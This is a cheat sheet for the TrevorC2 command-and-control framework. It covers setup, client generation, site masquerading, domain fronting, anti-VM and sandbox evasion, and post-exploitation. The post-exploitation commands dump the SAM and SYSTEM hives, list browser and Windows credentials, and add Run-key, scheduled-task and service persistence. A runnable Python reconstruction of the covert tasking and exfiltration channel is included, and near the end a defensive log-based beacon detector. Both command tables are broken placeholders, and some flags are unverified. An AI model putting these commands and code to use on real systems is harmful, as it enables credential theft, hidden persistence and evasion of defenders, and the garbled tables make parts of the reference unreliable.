# TrevorC2 Framework Cheat Sheet

## Overview

TrevorC2 is a client/server framework, developed by TrustedSec, that tunnels command-and-control (C2) traffic through what looks like a legitimate website. The server hosts a cloned copy of a real site and hides tasking inside the pages it serves; the client fetches those pages and returns results in ordinary-looking requests, so the traffic resembles normal web browsing and is hard to distinguish from it.

Warning: This tool is intended only for authorized penetration tests and red team exercises. Make sure you have proper authorization before using it in any environment.

## Installation
### Git Installation
```bash
# Clone the repository
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2

# Install Python dependencies
pip3 install -r requirements.txt
```
### Manual Setup
```bash
# Download the latest snapshot of the repository
wget https://github.com/trustedsec/trevorc2/archive/master.zip
unzip master.zip
cd trevorc2-master

# Install dependencies (pycryptodome is the maintained drop-in replacement for the
# unmaintained pycrypto package and provides the same Crypto.* namespace)
pip3 install pycryptodome requests
```
### Docker Installation
```bash
# Build the Docker container
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2
docker build -t trevorc2 .

# Run the container, exposing HTTPS
docker run -it -p 443:443 trevorc2
```
## Basic Usage

In the upstream scripts the settings (site directory, query paths, shared secret, certificate) live as variables at the top of trevorc2_server.py and trevorc2_client.py, so check which command-line switches your version actually accepts before relying on the flags below.

### Server Setup
```bash
# Start the TrevorC2 server
python3 trevorc2_server.py

# Start the server with a custom configuration
python3 trevorc2_server.py --config custom_config.py

# Start the server on a specific port
python3 trevorc2_server.py --port 8080
```
### Client Deployment
```bash
# Generate a client
python3 trevorc2_client.py

# Generate a client pointed at a custom server
python3 trevorc2_client.py --server https://example.com

# Generate a PowerShell client
python3 trevorc2_client.py --powershell
```
## Command Reference

### Server Commands

| Command | Description |
|---|---|
| INLINE_CODE_25 | Display help menu |
| INLINE_CODE_26 | List active agents |
| INLINE_CODE_27 | Interact with agent |
| INLINE_CODE_28 | Kill specific agent |
| INLINE_CODE_29 | Kill all agents |
| INLINE_CODE_30 | Exit server |

### Agent Interaction

| Command | Description |
|---|---|
| INLINE_CODE_31 | Execute shell command |
| INLINE_CODE_32 | Upload file to agent |
| INLINE_CODE_33 | Download file from agent |
| INLINE_CODE_34 | Take screenshot |
| INLINE_CODE_35 | Start keylogger |
| INLINE_CODE_36 | Stop keylogger |
| INLINE_CODE_37 | Dump keylogger data |
| INLINE_CODE_38 | Install persistence |
| INLINE_CODE_39 | Migrate to process |
| INLINE_CODE_40 | Background agent |
## Configuration

### Server Configuration
```python
# config.py
BIND_PORT = 443
HOSTNAME = "0.0.0.0"
WEBSITE_FOLDER = "site/"
CERT_FILE = "server.pem"

# Encryption settings
CIPHER_TYPE = "AES"
HASH_TYPE = "SHA256"

# Communication settings (seconds between beacons, and the fraction of random jitter applied)
BEACON_INTERVAL = 10
JITTER = 0.2

# Logging
LOG_FILE = "trevorc2.log"
DEBUG = False
```
### Client Configuration
```python
# Client settings
SERVER_URL = "https://example.com"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SLEEP_TIME = 10
JITTER = 0.2

# Persistence settings (raw string: "\M", "\W" and "\C" are not valid Python escapes)
PERSISTENCE_METHOD = "registry"
PERSISTENCE_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
```
## Advanced Features

### Website Masquerading
```bash
# Set up a legitimate-looking website front
mkdir site
cp -r /var/www/html/* site/

# Use a custom website
python3 trevorc2_server.py --site /path/to/website

# Clone an existing website (recursive, with page requisites, links rewritten to the local copies)
wget -r -p -k https://example.com
python3 trevorc2_server.py --site example.com/
```

Serve the clone intact: a front page whose images or stylesheets return 404, or whose response headers differ from the real site, is easy to spot.
### SSL/TLS Configuration
```bash
# Generate a self-signed certificate (key and certificate in one PEM file)
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

# Use a custom certificate
python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem

# Let's Encrypt certificate (port 80 must be reachable for the standalone HTTP challenge)
certbot certonly --standalone -d yourdomain.com
python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pem
```

A self-signed certificate is itself an indicator; use a CA-issued one for anything beyond a lab.
### Domain Fronting
```python
# Configure domain fronting: the TLS SNI names the CDN edge, the HTTP Host header names the real backend
FRONT_DOMAIN = "cdn.example.com"
HOST_HEADER = "legitimate-site.com"

# Client configuration for domain fronting
client_config = {
    'server_url': 'https://cdn.example.com',
    'host_header': 'legitimate-site.com',
    'sni': 'cdn.example.com'
}
```

Google and AWS CloudFront blocked domain fronting in 2018 and Azure Front Door followed later, so confirm the technique still works on the provider you intend to use before building infrastructure around it.
## Client Generation

### Windows Client
```bash
# Generate a Windows executable
python3 trevorc2_client.py --windows --output client.exe

# Generate a PowerShell client
python3 trevorc2_client.py --powershell --output client.ps1

# Generate a batch file client
python3 trevorc2_client.py --batch --output client.bat
```

### Linux Client
```bash
# Generate a Linux binary
python3 trevorc2_client.py --linux --output client

# Generate a Python client
python3 trevorc2_client.py --python --output client.py

# Generate a shell script client
python3 trevorc2_client.py --shell --output client.sh
```

### macOS Client
```bash
# Generate a macOS binary
python3 trevorc2_client.py --macos --output client

# Generate an AppleScript client
python3 trevorc2_client.py --applescript --output client.scpt
```
## Evasion Techniques

### Traffic Obfuscation
```python
import random

# Custom User-Agent strings
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
]

# Random beacon intervals: draw a fresh value before every beacon. A module-level
# SLEEP_TIME = random.randint(5, 15) is evaluated once at import, which makes the
# interval constant for the life of the process.
def next_sleep():
    return random.randint(5, 15)
```

Pick one User-Agent per agent and keep it; a single client IP that rotates its User-Agent on every request is itself anomalous.
### Payload Encoding
```bash
# Base64 encode payload
echo "payload" | base64

# XOR encode payload (single-byte key 0xAA, printed as hex; Python 3, str.encode('hex') was Python 2 only)
python3 -c '
import sys
key = 0xAA
payload = sys.argv[1].encode()
print(bytes(b ^ key for b in payload).hex())
' "your_payload"
```
### Anti-Analysis
```python
import subprocess
import time

# VM detection (Windows): look for hypervisor vendor strings in systeminfo output
def check_vm():
    vm_indicators = ['VMware', 'VirtualBox', 'QEMU']
    try:
        output = subprocess.check_output('systeminfo', shell=True,
                                         stderr=subprocess.DEVNULL).decode(errors='ignore')
    except (subprocess.CalledProcessError, OSError):
        return False
    return any(indicator in output for indicator in vm_indicators)

# Sandbox evasion: stall past typical automated-analysis timeouts
def sandbox_evasion():
    time.sleep(60)  # Sleep to avoid sandbox analysis
    # Check for mouse movement, user activity, etc.
```
## Post-Exploitation

### Information Gathering
```bash
# System information
shell systeminfo
shell whoami /all
shell net user
shell net group

# Network information
shell ipconfig /all
shell netstat -an
shell arp -a
shell route print
```
### Credential Harvesting
```bash
# Dump the SAM database (requires administrative privileges on the host)
shell reg save HKLM\SAM sam.hiv
shell reg save HKLM\SYSTEM system.hiv
download sam.hiv
download system.hiv

# Browser credential stores
shell dir "%APPDATA%\Mozilla\Firefox\Profiles"
shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"

# Saved Windows credentials
shell cmdkey /list
```
### Lateral Movement
```bash
# Network discovery (ping takes a single host, so sweep a range with a for loop)
shell net view
shell for /L %i in (1,1,254) do @ping -n 1 -w 200 192.168.1.%i | find "TTL="

# Share enumeration (UNC paths need two leading backslashes)
shell net view \\target-computer
shell dir \\target-computer\c$

# Service enumeration
shell sc query
shell tasklist /svc
```
### Persistence Mechanisms
```bash
# Registry persistence
shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"

# Scheduled task
shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon

# Service persistence (requires administrative privileges; the binary must implement the
# service control protocol, otherwise the SCM terminates it with error 1053 after the start timeout)
shell sc create "UpdateService" binpath= "C:\temp\client.exe"
shell sc config "UpdateService" start= auto
```
## Operational Security

### Communication Security
```python
# Encrypted communications: AES-GCM gives confidentiality and integrity.
# The key must be 16, 24 or 32 bytes (e.g. get_random_bytes(32)).
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

def encrypt_data(data, key):
    cipher = AES.new(key, AES.MODE_GCM)
    ciphertext, tag = cipher.encrypt_and_digest(data.encode())
    return cipher.nonce + tag + ciphertext

# Certificate pinning: trust only the pinned certificate file. Note that
# ssl.create_default_context() also loads the system CA store, so any CA-issued
# certificate would pass; start from a bare client context instead.
import socket
import ssl

def verify_certificate(hostname, cert_path, port=443):
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False       # the pin, not the name, is what we trust
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(cert_path)
    with socket.create_connection((hostname, port)) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()     # raises ssl.SSLError if the peer cert is not the pinned one
```
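The overview and the section above describe the channel in words. The following is an added example written for this cheat sheet, not code from TrevorC2 or TrustedSec, that reconstructs the shape of that channel end to end: the server hides a task for one host in an HTML comment of the cloned page, the client pulls it out, and results travel back in the query string of an image-looking path. The variable names, the `oldcss=` comment marker and the `hostname::payload` framing are my recollection of the published scripts and should be treated as assumptions; the SHA-256 key derivation, the IV-prepended base64 framing and the `/images?guid=` path are likewise assumptions for this example. The cipher is an HMAC-SHA256 keystream, a stand-in so the example runs on the standard library alone, where the real tool uses AES-CBC from pycryptodome.

```python
import base64
import hashlib
import hmac
import os
import re
from urllib.parse import parse_qs, quote, urlparse

# Names mirror the TrevorC2 configuration variables as I remember them; the comment
# marker and the "host::payload" framing are assumptions for this example.
CIPHER_PASSPHRASE = "change-me-per-engagement"   # shared secret; never keep a tool's default
SITE_PATH_QUERY = "/images"                      # path the client sends results to (assumed)
QUERY_STRING = "guid="                           # query parameter carrying client data (assumed)
COMMENT_MARKER = "oldcss="                       # marker of the hidden HTML comment (assumed)


def derive_key(passphrase: str) -> bytes:
    """Turn the shared passphrase into a 256-bit key with SHA-256."""
    return hashlib.sha256(passphrase.encode()).digest()


def _keystream(key: bytes, iv: bytes, length: int) -> bytes:
    # Stand-in for AES: HMAC-SHA256 run in counter mode over the IV. Keeps the
    # example standard-library only; TrevorC2 itself uses AES-CBC (pycryptodome)
    # with the same derived key and the same IV-prepended, base64-encoded framing.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key: bytes, plaintext: str) -> str:
    iv = os.urandom(16)                       # fresh IV per message, prepended to the ciphertext
    data = plaintext.encode()
    ct = bytes(a ^ b for a, b in zip(data, _keystream(key, iv, len(data))))
    return base64.b64encode(iv + ct).decode()


def decrypt(key: bytes, token: str) -> str:
    raw = base64.b64decode(token)
    iv, ct = raw[:16], raw[16:]
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, iv, len(ct)))).decode()


def server_embed_task(key: bytes, page_html: str, hostname: str, command: str) -> str:
    """Server side: hide the next task for one agent in the served page. The page is
    the cloned legitimate site, so the only on-page artefact is one HTML comment."""
    blob = encrypt(key, f"{hostname}::{command}")
    return page_html.replace("</body>", f"<!-- {COMMENT_MARKER}{blob} --></body>", 1)


def client_extract_task(key: bytes, page_html: str, hostname: str):
    """Client side: GET the root page, pull the comment, decrypt, and keep the task
    only if it is addressed to this host. Returns None when there is nothing for us."""
    m = re.search(r"<!-- " + re.escape(COMMENT_MARKER) + r"(.*?) -->", page_html)
    if not m:
        return None
    target, _, command = decrypt(key, m.group(1)).partition("::")
    return command if target == hostname else None


def client_result_url(key: bytes, site_url: str, hostname: str, output: str) -> str:
    """Client side: command output rides in the query string of an image-looking
    path, so on the wire it resembles an ordinary asset request."""
    blob = encrypt(key, f"{hostname}::{output}")
    return f"{site_url}{SITE_PATH_QUERY}?{QUERY_STRING}{quote(blob, safe='')}"


def server_parse_result(key: bytes, url: str):
    """Server side: recover (hostname, output) from the agent's request URL."""
    params = parse_qs(urlparse(url).query)
    blob = params[QUERY_STRING.rstrip("=")][0]
    host, _, output = decrypt(key, blob).partition("::")
    return host, output


if __name__ == "__main__":
    key = derive_key(CIPHER_PASSPHRASE)
    page = "<html><body><h1>Welcome</h1></body></html>"   # constructed stand-in for the cloned site
    served = server_embed_task(key, page, "WS01", "whoami")
    print(served)
    print(client_extract_task(key, served, "WS01"))
    url = client_result_url(key, "https://example.com", "WS01", "corp\\alice")
    print(url, server_parse_result(key, url))
```

Two things worth noticing when running it: a host that is not the addressee learns nothing from the comment beyond the fact that it exists, and every agent shares one passphrase, so compromise of one client's binary exposes the whole channel. That is why the shared secret and the query/path names should be changed per engagement rather than left at a tool's defaults.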
### Operational Procedures
- Rotate infrastructure regularly
- Use different domains and IPs
- Implement proper logging and monitoring
- Use legitimate certificates
- Vary communication patterns
## Troubleshooting

### Connection Issues
```bash
# Check server status (ss is the modern replacement for netstat)
netstat -tlnp | grep :443
ss -tlnp | grep :443

# Test connectivity (-k skips certificate verification for self-signed certs)
curl -k https://your-server.com

# Check firewall rules
iptables -L
ufw status
```
### Client Issues
```bash
# Debug client connection: add debug prints to the client code, e.g.
#   print("Connecting to server...")
#   print(f"Response: {response.status_code}")

# Check DNS resolution
nslookup your-server.com
dig your-server.com
```
### Certificate Issues
```bash
# Verify certificate
openssl x509 -in server.pem -text -noout

# Test SSL connection (-servername sends SNI, which name-based virtual hosts need)
openssl s_client -connect your-server.com:443 -servername your-server.com

# Check certificate chain
curl -vI https://your-server.com
```
## Detection Evasion

### Network Level
- Use legitimate domains and certificates
- Implement domain fronting
- Vary communication intervals
- Use common ports (80, 443)
- Mimic legitimate traffic patterns

### Host Level
- Avoid common IOCs
- Use legitimate process names
- Implement anti-VM techniques
- Use fileless execution
- Encrypt payloads and communications

### Behavioral
- Limit resource usage
- Avoid suspicious activity
- Use legitimate user accounts
- Implement proper error handling
- Clean up artifacts
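The lists above are written from the operator's side. As an added example (not part of this page and not TrustedSec's code), here is the corresponding check a defender would run over web-server access logs to catch exactly what "vary communication intervals" and "mimic legitimate traffic patterns" are trying to defeat: a client that returns at near-constant intervals to a tiny set of paths. The log lines are constructed for the example, not a real capture; the thresholds are starting points, not tuned values.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed combined-format access log (not a real capture). 10.0.0.5 behaves like a
# TrevorC2-style agent, alternating GET / (poll for tasks) and GET /images?guid=... (return
# results) roughly every 10 seconds; 10.0.0.7 is a person browsing the same site.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.7 - - [10/Oct/2023:13:55:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
10.0.0.7 - - [10/Oct/2023:13:55:05 +0000] "GET /about.html HTTP/1.1" 200 2210 "https://example.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:55:11 +0000] "GET /images?guid=QWJjZGVmZ2hpams= HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:55:20 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:55:31 +0000] "GET /images?guid=TG1ub3BxcnN0dXY= HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /css/main.css HTTP/1.1" 200 8800 "https://example.com/about.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:55:51 +0000] "GET /images?guid=V3h5ejAxMjM0NTY= HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:56:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.5 - - [10/Oct/2023:13:56:11 +0000] "GET /images?guid=Nzg5YWJjZGVmZ2g= HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.7 - - [10/Oct/2023:13:57:10 +0000] "GET /images/logo.png HTTP/1.1" 200 14020 "https://example.com/about.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
10.0.0.7 - - [10/Oct/2023:13:59:00 +0000] "GET /contact.html HTTP/1.1" 200 1900 "https://example.com/about.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
10.0.0.7 - - [10/Oct/2023:13:59:03 +0000] "GET /js/app.js HTTP/1.1" 200 3300 "https://example.com/contact.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
"""

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row["ts"] = datetime.strptime(row["ts"], "%d/%b/%Y:%H:%M:%S %z")
        row["path"] = row["target"].split("?", 1)[0]   # strip the query string for path counting
        rows.append(row)
    return rows


def find_beacons(rows, min_requests=6, max_cv=0.25, max_paths=3):
    """Flag (ip, user-agent) pairs whose inter-request gaps are nearly constant
    (coefficient of variation <= max_cv) and that only ever touch a few paths.
    Human browsing has bursty timing and fans out across many assets; a beacon
    with +-20% jitter still has a CV around 0.1."""
    by_client = defaultdict(list)
    for r in rows:
        by_client[(r["ip"], r["ua"])].append(r)
    findings = {}
    for (ip, ua), reqs in by_client.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        paths = {r["path"] for r in reqs}
        if cv <= max_cv and len(paths) <= max_paths:
            findings[ip] = {
                "mean_interval": round(avg, 1),
                "cv": round(cv, 3),
                "paths": sorted(paths),
                "user_agent": ua,
            }
    return findings


if __name__ == "__main__":
    for ip, info in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(ip, info)
```

On the constructed log only 10.0.0.5 is flagged: eight requests about ten seconds apart to just `/` and `/images`, all without a Referer, while 10.0.0.7 fans out over six paths with gaps from 3 to 110 seconds. The same logic works on proxy or NetFlow records once the timestamps and a client identifier are available; lengthening the window and lowering `max_cv` trades detection speed for fewer false positives from legitimate pollers such as monitoring agents.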
## Resources
- [TrevorC2 GitHub Repository](https://github.com/trustedsec/trevorc2)
- TrustedSec Blog
- TrevorC2 Documentation
- [Red Team Infrastructure](https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/)

---

*This cheat sheet provides a comprehensive reference for using TrevorC2. Always make sure you have proper authorization before using this tool in any environment.*